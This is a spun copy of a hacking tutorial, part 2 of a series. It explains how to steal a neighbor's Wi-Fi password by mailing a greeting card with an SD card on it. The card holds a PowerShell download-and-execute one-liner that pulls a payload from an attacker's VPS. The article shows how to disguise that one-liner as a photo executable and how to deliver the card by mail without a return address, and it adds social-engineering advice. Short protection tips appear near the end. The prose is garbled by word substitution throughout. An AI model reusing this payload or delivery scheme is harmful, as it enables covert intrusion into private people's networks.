3 weeks ago

How to Hack Anyone’s Wi-Fi Password Using a Birthday Card, Part 2 (Executing the Attack) « Null Byte :: WonderHowTo

from the previous article, we learned how to set up our VPS, configure our PHP server, in addition to developed an in-depth understanding of how the payload works. With all that will taken care of, we can get into disguising our payload to appear as an image in addition to crafting the note from the greeting card being delivered to our intended target.

To elaborate slightly, we’ll convert the “Stage 1” payload we learned about last time into an executable in addition to modify its icon to make the idea appear to be a normal JPG image. With that will out of way, the only thing left to do is usually put an enticing note from the greeting card in addition to send the idea out along with the SD card or USB flash drive. After that will, we just sit back in addition to relax in addition to wait for the information to hit our PHP server.

Step 1: Find Photos for the Storage Device

We’ll need to populate the SD card (or USB drive) with at least one real photo to make that will attack work. Clicking on one payload executable will open one real photo on the SD card, in addition to stealthfully grabbing Wi-Fi passwords, generating sure that will the idea looks like the executable itself is usually that will photo.

the idea will be possible to have multiple real photos on the SD card in addition to have each payload open a different photo. that will will help disguise the attack in addition to prevent the target user by being suspicious of “photos” that will don’t actually open.

Depending on what social engineering angle you take when writing a message from the card, these images can be random vacation photos, adorable puppies, or photos of a person you believe the target will find attractive.

Whatever you choose, make sure the images are perfectly even squares in addition to as large as possible. Ideally, an image with the aspect ratio of over 720 x 720, like the square images found on Instagram, will create a perfect icon file. Any uneven or modest aspect ratios will cause the icon file to appear with an unusual amount of whitespace around the icon in addition to may cause your attack to fail.

Step 2: Save the Photos to the Storage Device

Once you’ve found a photo you want to use, save the idea to the SD card (or USB flash drive). Doing the idea that will way will intersperse real photos with our payloads, yet that will will result in duplicate photos showing up — the real photo in addition to our fake photo with the payload.

Ideally, hide the real photo(s) on the storage device. Windows doesn’t display hidden files by default, so there’s a Great chance your target will not be able to see any files you hide on the device. the idea might be beneficial to hide the real photos in addition to make only payloads accessible to the target.

To hide photos using Windows, right-click on the photo, view the “Properties,” then check the “Hidden” attribute followed by “OK.”

Cat image found at Flickr by Charles Nadeau (CC BY 2.0).

Step 3: Convert the Payload Photo into ICO Format

right now that will we have a least one image, we can convert the JPG into an ICO format. ICO is usually an icon file format used by the Windows operating system to display modest icon images. To do the conversion, I recommend using ICO Converter online.

After navigating to the ICO converter website, click the “Browse” button to select the photo you wish to convert in addition to be sure to check all of the size (pixels) options available. If you don’t check all of them, there’s a chance the ICO produced will have an unnecessary amount of whitespace around the icon in addition to cause the image to appear malformed.

Then, click the “Convert” button. After a moment, you’ll be asked to save the brand-new ICO. Save the idea to the Downloads folder on your computer — don’t save the idea to the SD card accidentally. We still have to build the PowerShell script into an executable payload that will will use that will brand-new icon image as well as the photo already on the storage device.

Step 4: Install a BAT to EXE Converter

To convert PowerShell scripts into executables, we’ll be using a Windows program called BAT to EXE Converter (B2E), which will also allow us to change the icon of the executable to make the idea appear as an image file.

I urge readers to use B2E in an offline, sandboxed, or disposable Windows OS virtual machine. B2E was flagged by VirusTotal as being a potentially malicious file. There are many virtual Windows machines at my disposal, so I didn’t hesitate to try that will program. in addition to being a determined hacker, I’ll use whatever program necessary to achieve my goal. B2E may be dangerous or harmful to your computer. Install in addition to use with caution.

To install the program, head over to the B2E download page, complete the CAPTCHA, in addition to click the big “Download” button. The F2KO (the developer) website uses a modern CAPTCHA system, which requires you to allow the website temporary use of your computer’s CPU to mine cryptocurrency. The CAPTCHA process will cause your CPU to spike dramatically while the crpyto-miner is usually working. When the B2E download is usually completed, simply close the browser tab to stop the miner.

If you’re not comfortable letting the F2KO website use your CPU in exchange for the B2E software, you can download the B2E .zip by my GitHub page where I’m currently hosting a download mirror.

After acquiring the “Bat_To_Exe_Converter.zip”, open the archive, in addition to click on the “Bat_To_Exe_Converter_(Installer).exe” to start installing B2E. The B2E installer will ask you to select your preferred language, agree to the license agreement, in addition to select an installation destination. Continue clicking “Next” until the installer is usually complete, in addition to B2E will open automatically.

Step 5: Convert the Stage 1 Script to EXE

Copy the below “Stage 1″ script into the B2E window that will pops up. We discussed that will script in detail from the last article, if you need to refresh your memory.

powershell -ExecutionPolicy Bypass “IEX (brand-new-Object Net.WebClient).DownloadString(‘http://YOUR-VPS-IP-HERE/payload.ps1’);”

Remember to change the “YOUR-VPS-IP-HERE” address to the IP address of your VPS running the PHP server.

Then, click the “Save” button in addition to name the file whatever you like — the idea won’t affect any part of the hack. I’ll name the idea as “tokyoneon.” Check the “Icon” option, select the image ICO we created earlier in Step 3, in addition to use “64 Bit | Window (Invisible)” as the Exe-Format option. The “Invisible” option will prevent any cmd terminals by popping up when files on the SD card (or USB drive) are opened.

Next, click on the “Convert” button to create the executable. You’ll be asked by B2E to select a save destination. Save the newly converted EXE to the SD card (or USB drive), in addition to you’re done!

that will payload will just send a request for our Stage 2 payload located on our PHP server, which will look for the storage device name in addition to the real photo on the storage device, then show them the real photo when clicking the image while sending back their Wi-Fi credentials to us on the server.

Step 6: Pick the Right Greeting Card

There’s a Great chance you’ve needed to purchase a greeting card for a friend, coworker, or relative at some point in your life. Buying a greeting card for your intended target in addition to using the idea to deliver the SD card (or USB drive) in addition to your payload isn’t too different. Ask yourself: what kind of greeting card might they buy for themselves?

There will likely be many greeting card options available to you. The kind of card in addition to note you leave for the intended target will likely rely heavily on your casual day-to-day observations of them.

Image by niloo138/123RF

When you last saw your neighbor, were they out walking their dog? A greeting card covered in impossibly cute puppies might be well suited for them.

is usually your intended target a 25-year-old male who sometimes brings home different girlfriends? A romantic or Valentine’s Day card containing some suggestive text might be a better fit.

Unfortunately, the observations we make of our neighbors will likely be very shallow in addition to we may find ourselves relying on unfair stereotypes. Try to be as observant as possible in addition to choose the greeting card that will will most likely invoke strong feelings of excitement in addition to curiosity in your target.

Step 7: Fill Out the Greeting Card (Optional)

What’s written on the greeting card needs to be believable enough to seduce the target into wondering what content is usually on the SD card (or USB drive). The writing on the card can be very minimal, just one or two sentences, yet keep in mind how you are planning to send the card later. If you are targeting them directly, use their name yet make sure to do enough research on them to make sure what you say makes sense. If you mention their kid’s name, the idea better be their real kid’s name.

However, you could also try to go the random route, in addition to not mention any names on the card or envelope. They will likely still open the idea, in addition to they might even be more enticed to look into what’s on the storage device. You could also try using the wrong name on the envelope in addition to from the card, yet the idea’s a federal crime to open someone else’s mail, so that will will likely not happen unless they think money is usually from the card.

Step 8: Deliver the Goods

With our VPS hosting our Stage 2 PowerShell payload in addition to PHP server, our greeting card inscribed having a convincing handwritten note, in addition to our SD card (or USB drive) containing the Stage 1 PowerShell payload/s, the idea’s time to put the idea all together in addition to deliver the greeting card to our intended target. We have two options here.

Option 1: Drop the Card Off Directly

Not using a paid mail service might certainly expedite the process. After all, the idea seems silly to actually mail the package to your target, especially if your target is usually a neighbor from the apartment next door. Just place the envelope above or near the intended target’s mailbox where they’re most likely to see the idea.

However, doing that will is usually dangerous. The package might be clean — too clean. Have you ever received a package from the mail that will wasn’t corroded, dirty, or mishandled? the idea also wouldn’t receive an official stamp by the post office legitimizing its process through the mailing system. Delivering the package like that will will likely arouse suspicion in addition to give your target reason to believe the attacker is usually local in addition to nearby.

Option 2: Mail the Card & Wait

To maximize the potential for success, place a postage stamp on the package, drop the idea in a mailbox, in addition to wait 3–10 business days for the idea to be delivered to your target. that will way, the package will be properly processed by the mailing services, stamped, in addition to adequately battered while en route to its destination. The mailman might even hand-deliver the package to the intended target. that will will go a long way in creating a sense of legitimacy.

The major downside to taking that will approach is usually the week you’ll need to wait before the target receives the package. the idea’s riskier, yet be sure not to include a return address on the package. If the package is usually rejected, lost from the mail, or for some reason isn’t able to be delivered to your target, you’ll simply need to count that will as a failed attempt.

Step 9: Find Their Wi-Fi Credentials

having a little luck, your target clicked on a payload. Back on your VPS, a brand-new file containing their Wi-Fi credentials might have been created. SSH back into your VPS in addition to change into the phpServer directory as we did in the first article when testing the PHP server. Use the ls in addition to cat commands to view in addition to read files from the phpServer directory.

No Payload is usually Perfect

that will PowerShell attack isn’t perfect. If the target device is usually using an Ethernet cable to connect to the router, the above PowerShell payload won’t work. If the target device is usually not connected to the internet, there’s no contingency or redundancy built-in to the payload that will forces a connection to the internet; the HTTP request will fail in addition to the Wi-Fi credentials will not reach your VPS. in addition to, of course, if the target inserts the SD card into their digital camera or smartphone, they’ll be able to view hidden photos yet won’t be able to execute the payloads.

the idea’s also worth noting that will every day that will article is usually online, that will attack becomes less in addition to less effective. Thousands of Null Byte readers begin using similar PowerShell payloads in addition to uploading them to virus scanners like VirusTotal, a public database of malware which distributes payloads in addition to detection information to major antivirus companies around the globe. that will is usually harmful to the success of such hacks. that will is usually the cat-in addition to-mouse game hackers play with antivirus software companies.

There may never be a perfect payload for compromising a computer. If you know a more effective payload method than the PowerShell method featured in that will article, feel free to use that will payload with the social engineering greeting card trick.

How to Protect Yourself

  • Don’t insert strange SD cards or USB flash drives into your computers. the idea seems obvious, yet the idea has to be said. If you find a strange storage device in a public place, on the ground, or even in your bag or home — don’t trust the idea.
  • If you truly can’t help yet find out what content is usually on a storage device, use an isolated in addition to offline computer — not your primary or favorite laptop.
  • If you’re using Windows, use the “Detailed” format view from the File Manager. that will will display file type information in addition to may help you spot strange or suspicious file types.
  • If you’re using Windows OS, make sure file type extensions are not “Hidden”.
  • Don’t open packages from the mail that will are not directly addressed to you — no matter how big or modest.
  • Share that will article. the idea seems silly, yet public awareness can go a long way. If more people understood how far hackers will go to compromise a wireless network, they might be more suspicious of strange items arriving from the mail.

The Cost of that will Wi-Fi Hack

that will kind of attack is usually by no means a quick solution for compromising someone’s Wi-Fi network. that will hack can take hours to set up in addition to days to go by configuring the server to executing the payload. Only a very patient, methodical, in addition to determined hacker might exercise that will kind of attack. in addition to let’s not forget the financial cost of all of that will.

  • VPS: $5
  • SD card: $7–$20
  • greeting card: $4–$9
  • postage: about $2

The moral cost is usually more difficult to gauge. that will article is usually a lot different by different content online you’ll find related to Wi-Fi hacking. Some readers might define that will method as extreme, overkill, invasive, or creepy — in addition to they might be correct. Many social engineering tactics in addition to techniques go far beyond “unethical.” At least right now we know what kinds of devious tricks attackers might use to gain access to our home or work networks in addition to what we can do to better protect ourselves.

I’m curious to know what social engineering tricks readers have to offer. How do you feel about using a greeting card as a payload delivery system? Leave your comments below.

in addition to until next time, you can find me on the darknet.

Cover photo by Justin Meyers/Nul Byte; Screenshots by tokyoneon/Null Byte

Previously: How to Hack Anyone’s Wi-Fi Password Using a Birthday Card, Part 1 (Creating the Payload)

Don’t Miss: How to Hide Secret Data Inside an Image or Audio File in Seconds Using Steganography

Don’t Miss: Creating an Invisible Rogue Access Point to Siphon Off Data Undetected

Don’t Miss: How to Extract Email Addresses by an SMTP Server

Don’t Miss: How to Use Kismet to Watch Wi-Fi User Activity Through Walls

Don’t Miss: Get Anyone’s Wi-Fi Password Without Cracking Using Wifiphisher

Don’t Miss: How to Know if You’ve Been Hacked

Leave a Comment

Your email address will not be published. Required fields are marked *

3 × 3 =